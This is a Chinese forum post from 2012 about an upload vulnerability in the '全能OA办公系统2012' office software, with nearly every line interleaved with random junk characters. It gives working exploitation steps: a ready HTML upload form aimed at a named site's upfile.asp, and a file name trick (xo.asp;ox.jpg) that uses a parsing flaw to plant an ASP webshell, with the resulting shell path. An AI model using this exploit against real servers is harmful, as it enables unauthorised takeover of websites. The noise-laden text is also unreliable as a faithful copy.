全能OA办公系统 上传漏洞
: ^/ Z9 w/ m- R7 H2 w6 T( B6 h7 D3 C
5 Y& ~8 r4 c. h系统介绍:
6 C, V" r( M0 k
; o( q7 K8 G7 h& o全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
- G; C2 S) Z: s% g6 t" s. ?. D
9 g8 M# l% g5 a' U3 v# `4 ?# b* p主要功能:" f" E% Y1 q& d7 U0 e+ [) l
公司通告 9 Y5 [! `# D k% p/ j: D4 d; P
工作计划
- b5 s, f2 _& k# m% p( X通讯助理 2 N1 {4 H- L4 T9 R) E0 A
客户资源
" m! Y* n" F& L1 [我的公文
6 g2 Y9 E7 f/ p, W* z7 q3 c公文传阅 ! }! O7 `7 M. t9 W9 v( V! o
公共资源
1 O" `: B* n/ Y: ^资源预约 ! _# k# v' u) _ H& s( j: N
今日考勤
; \9 e' s& H) X" f5 N: P个人计划 & T* g; e5 t& U( L5 ?1 X! N
个人通讯录 # {: ~6 V1 K' P$ n- z# \
个人基本档案
3 c; d) r+ G( h# O* g未读邮件
4 g$ m3 y6 t, R4 N$ L& h& S发邮件 8 ]8 T" P6 P8 {# A& u; A" Q
收件夹
6 Q3 M+ S/ w! p) h: c" `寄件夹 % I" x6 d: Q3 [0 t
网络硬盘 ' {+ C9 H& M2 v% U$ ~
网络会议
+ Z3 P& \* o, m5 L/ O网络调查
7 q& L/ J+ d: k& W' x交流论坛8 o7 U! q7 P: `7 ]) N8 x
$ X8 x6 e) Q( L9 R# T. [有兴趣测试的朋友可以下源码看看
& \' w+ b1 G! q, [* C
$ S. c" O0 O: B" Q, g: X源码下载:/ W9 X, H0 g$ f( s9 L' V
0 a, H) t( B1 s5 p/ j0 r- N
http://www.mycodes.net/30/4750.htm
, ?( \% \& e( ~# ]) J
! c5 P: h5 X! H" }$ M漏洞介绍:
3 }. O# o3 n8 G, i& U( u2 x" Q/ F8 R! E( ?0 U8 W5 c, U
由upfile.asp上传文件漏洞引起+ B/ g7 B! R0 m8 \/ [9 N' |
& f1 w# }0 B" G. s! ~+ I0 a% W
测试方法:
! h) [; N, _4 Q# [8 \+ S8 s5 v* k6 C% R
使用名小子上传http://www.itlynn.com/upfile.asp即可
* ~4 B. H7 o, c2 ] V( { ^' g# O: e- `
如果upfile.asp文件被删除不存在。
8 j1 t; Q' |5 W& ]% s9 ^& y8 _7 L I" P: @. O
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。) z7 x+ i, H% I& v/ l
8 v6 Q% l$ @: W) o! j如果存在那么将如下代码保存为upfile.html。
7 s* F1 G; C' M/ B& u. `8 K7 V! N; q w7 R U
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。: ~# ?3 C8 A- `% U3 m$ U
2 u# b# a- M5 c5 W: |
% P" f5 Z P% _# Y
" |5 c, p4 g9 u
01 <table border='0' align="center" cellpadding="5"> - Q8 G3 r. B" I
+ m$ [- W, d8 j& m* A$ o$ }9 i9 G9 y4 ]
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
# i5 c4 Z* D% z% D* |. Y
@' S9 j, f' H6 V03 <tr>
1 Z" `6 m# | J9 X; ~; v- G( O# @
! P& V$ ?- J5 z5 K' u5 v, X% k4 W04 <td>报错:</td> & z, b, }4 {+ O/ g5 U) C% q, @
2 i1 s$ V5 C' r3 C! q6 ?0 Y05 <td><input type='radio' name='errnumber' value='0'> ' b# X/ r, q0 z- `/ N ? Y" b
/ W! A# O& [0 y" c06 自动更名 5 D- t) o) U" j" S7 p+ i
7 X- E, v7 w/ |9 @7 U1 ]8 c07 <input type='radio' name='errnumber' value='1' checked>
5 }) Y. P; s6 I/ g3 b/ _* e" N9 ~; d
# q7 Y1 z% O5 T- W2 U08 报错方式
: Z. S9 [) _ k! S/ i# C+ n# H
: K( @) {( w/ K/ m' v5 |09 <input type='radio' name='errnumber' value='2'>
6 e. @6 C1 j g' c' E. M# ^1 Y7 T2 S
' b* s( H- Q' g( r10 直接覆盖</td> 8 [& q ], l5 }+ \* u4 g. ^* y. I
1 W( S4 s \3 y+ W6 U
11 </tr> d0 T O% w3 ]8 h3 i& S) S6 U' }" J! e
5 x& b! j, i( L12 <tr> ( U6 g3 Z% ^& X
3 g5 L3 J; O7 ?
13 <td>主题:</td> " S7 y1 Y. @" f% x
0 t( [. E; X' y, `1 _14 <td><input type='text' name='filename' size='30'></td>
: D5 ~) O( R- l1 F. y" j& S5 K# j2 ^' R! X$ n2 q1 d9 r$ @
15 </tr> & a. b6 r* u' k2 t/ P1 N z/ A9 S
' n9 _1 h7 X3 v6 t q9 |
16 <tr>
I' v3 S/ ]2 a7 f! L6 f* p) v4 L1 R% C# j
17 <td>文件:</td> $ K/ W0 F) l1 j+ S
2 f7 }+ k- [, p* ^18 <td><input type="file"name="fruit"size="30"></td>
" }' a- X6 v& y/ w) c# A8 n4 \9 w- _- P$ [" W* V5 q
19 </tr>
4 S% |, B: e8 Q6 e2 D
& j: K' R3 x" S& B' F) v" ^) ^' @; I20 <tr> ; G& K, `! Y, X( `0 d; w" D
+ ^3 a0 X( J( d: l* M2 b
21 <td valign='top'>简介:</td> w0 r8 @2 L3 f" T( q" b& B
' i$ _# w4 {3 y9 X" d. L& w
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 4 |% Z# i# ~* Z
* t5 y* W* \* a6 X) |$ `) f0 x23 </tr> 8 N0 s! `. R3 b' t3 F8 A' @; m
! ^9 R9 S: ^& k7 E- Y24
u0 [* V3 I7 u' \3 p
& {8 q4 P( D# L. t* @25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
* \/ A; A% C% @- z) o& v7 T7 q; Y% g ]/ M+ e$ ~+ ]
26 </tr> 1 @. e% Z1 z: Q. {
- o5 m4 I8 V3 l6 @: a" ^0 A27 </form> + h" q: O; y0 B( _) N& Q
& F9 L0 G: g4 f8 h6 i然后打开上传一个文件名为xo.asp;ox.jpg的文件。" q; F% {8 Q6 a5 [3 C
9 S6 b+ H. u/ L+ U - k8 L7 @1 i0 o1 X+ U2 r& w+ g
) I+ \2 h" F2 y+ j0 ]9 S上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
4 {3 D. t0 i0 ~2 ~( G) @, n! L2 q1 U, T g& v$ X9 p* ]
此漏洞需要配合解析漏洞利用。' T i2 z9 o$ \9 ]) u
5 o: D2 c- }6 H' o z
|
发表于 2012-11-21 13:45:12
收藏
支持
反对